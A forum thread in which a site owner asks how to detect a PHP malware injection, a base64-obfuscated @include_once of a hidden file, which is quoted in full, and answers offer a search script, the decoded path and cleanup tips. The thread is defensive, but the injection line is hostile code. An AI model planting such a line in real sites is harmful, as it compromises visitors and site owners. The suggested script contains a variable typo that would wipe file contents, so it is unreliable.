Code to search for a specific code any file in a directory and sub directory

Ok I am pretty new to php but I know it can read directorys and files.

I have been struggling with malware problem on one of our sites and I need to write a script to search for it on my host space.

The code the hackers are putting in the files is

*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDct开发者_高级运维Mi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>

I have no idea what this is but google blocks my site when this shows up.

I have to download all the files then search it in dreamweaver replace this crap with a space and put it back.

I need a script to detect this before google does.

If any one can give me some pointers it will be great

I am sure this is a problem that everyone will face now or later.

Pure PHP solution that will find and replace the string you provided. Alternatively, you can just obtain files that have been modified. Note: if you use this code, there is NO UNDO option, you're using it on your own risk.

$dir = '/your_dir/';
$searchstring = '*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>'

$iterator = new RecursiveDirectoryIterator($dir);

foreach (new RecursiveIteratorIterator($iterator) as $filename => $cur) 
{
    // Search and replace

    $contents = file_get_contents($filename);   
    $contents = str_replace($searchstring, ' ', $content);  
    file_put_contents($filename, $contents);

    // Alternatively, you can do this (instead of search and replace)

    if(strpos($contents, $searchstring) !== false)
    {
        $infected[] = $filename; // gives you an array that gives you paths to files that contain the injected code.
    }
}

You can run the script either from browser or command line. I'm not saying this is the best option tho.

Download all with your FTP and run a find & replace for a complete directory (dreamweaver supports complete directories). I've had this problem once aswel, you might wanna look for javascript hacks in your code aswell, they tend to do javascript includes also.

The hack code tries to include this file:

/home/users/web/b1643/sl.thechess/public_html/MedcourtBackupoct2007/MedcourtBackupoct2007-2/b2b customer/Bubblepost Back up/public_html/Backups/Mediasuface 2005/Help and documentation/java api/JavaAPI/com/mediasurface/datatypes/searching/class-use/tsdeo.php

What this is? I don't know, but that's what it's trying to do. So you might consider this hack to be done from inside the server you're hosted on I think.

If you have SSH access you can use a command like this just replace "eval(base64_decode" with "base64_decode".

If not you will want to write a script that does a recursive loop through all of your files with readdir and then use some strpos magic to detect "base64_decode".

And if your really having problems I would recommend a 3rd party service like sucuri.

Good luck!